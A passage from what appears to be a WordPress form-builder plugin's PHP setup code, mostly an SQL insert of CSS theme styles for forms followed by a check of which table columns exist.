!important;\ncursor:pointer !important;\nbackground-color:#FF944C !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FF944C !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #FF944C !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #FF944C !important;\nbackground-color:#0090E3 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#0090E3 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#0090E3 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #0090E3 !important;\nborder-radius:7px !important;\n}', 0),
(39, 'Style 6 Yellow - Black', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:8px solid #FFF000 !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #000000 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #FFF000 !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\ncolor:#000000 !important;\nopacity:0.99 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.am_pm_select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000000 !important;\n}\n.wdform_address input\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000000 !important;\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_colon\n{\ncolor:#000000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.wdform_line\n{\ncolor:#000000 !important;\n}\n.time_box\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.file_upload\n{\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000000 !important;\n}    \n.page_deactive\n{\ncolor:#FFF000 !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nborder:4px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFF000 !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FFF000 !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #FFF000 !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #FFF000 !important;\nbackground-color:#000000 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#000000 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:red !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #000000 !important;\nborder-radius:7px !important;\n}', 0),
(40, 'Style 6 Purple', 'table {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#770038 !important;\nborder:8px solid #F085AF !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #770038 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #F085AF !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\ncolor:#770038 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#770038 !important;\n}\n.wdform_date_fields select\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\n}\n.am_pm_select\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#770038 !important;\n}\n.wdform_address input\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#770038 !important;\nborder:1px solid #770038 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\n}\n.wdform_colon\n{\ncolor:#770038 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#770038 !important;\n}\n.wdform_line\n{\ncolor:#770038 !important;\n}\n.time_box\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #770038 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#770038 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#770038 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#770038 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #770038 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#770038 !important;\nfont-style:normal !important;\nborder:1px solid #770038 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#770038 !important;\n}\n.file_upload\n{\nborder:1px solid #770038 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#770038 !important;\n}    \n.page_deactive\n{\ncolor:#F085AF !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#770038 !important;\n}\n.page_active\n{\ncolor:#770038 !important;\nborder:4px solid #770038 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#F085AF !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#F085AF !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #F085AF !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #F085AF !important;\nbackground-color:#770038 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#770038 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#770038 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #770038 !important;\nborder-radius:7px !important;\n}', 0),
(41, 'Standard', '.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n	font-size:12px !important;\n}\n.wdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\n.wdform_table2{\nfloat: left;\n}\n.ch_rad_label{\n	color:#000 !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 td{\n	text-align:left !important;\n	border-width:inherit !important;\n}\n.wdform_address select{\n	font-size:12px !important;\n}\n.label{\n	font-size:14px !important;\n	color:#000 !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	border-width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:center;\n	font-size:12px !important;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.mini_label{\n	color:#000 !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		font-size:14px;\n		-webkit-transition: all 0.0s linear;\n		background-color:#FFF !important;\n		background:#FFF !important;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:0px !important;\n		margin-bottom:0px !important;\n		padding-top:0px ;\n		padding-bottom:0px;\n		color:#000;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 select{\n	font-size:14px;\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n	display:inline !important;\n}\n.wdform_table1 button{\n	margin:1px !important;\n}\n.form_view\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\n}\n.wdform_table1 button\n{\ncursor:pointer !important;\n}\n.no_spacing\n{\npadding-right:50px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 18px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:18px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\nborder:1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\nborder:1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#878787 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:yellow !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:5px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:white !important;\nborder-radius:30px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.wdform_percentage_title\n{\npadding-left:20px\n}\nspan.wdform_page_button\n{\ncursor:pointer !important;\n}', 1);

HEREQUERYTHEMT;
      else
        $form_maker_theme_rows = '';
      $form_properties = $wpdb->get_results("DESCRIBE " . $wpdb->prefix . "formmaker", ARRAY_A);
      $exists_form_front = 0;
      $exists_theme = 0;
      $exists_submit_text = 0;
      $exists_url = 0;
      $exists_submit_text_type = 0;
      $exists_script_user1 = 0;
      $exists_script_user2 = 0;
      $exists_pagination = 0;
      $exists_show_title = 0;
      $exists_show_numbers = 0;
      $exists_public_key = 0;
      $exists_private_key = 0;
      $exists_recaptcha_theme = 0;
      $exists_css = 0;
      foreach ($form_properties as $prop) {
        if ($prop['Field'] == 'form_front')
          $exists_form_front = 1;
        if ($prop['Field'] == 'theme')
          $exists_theme = 1;
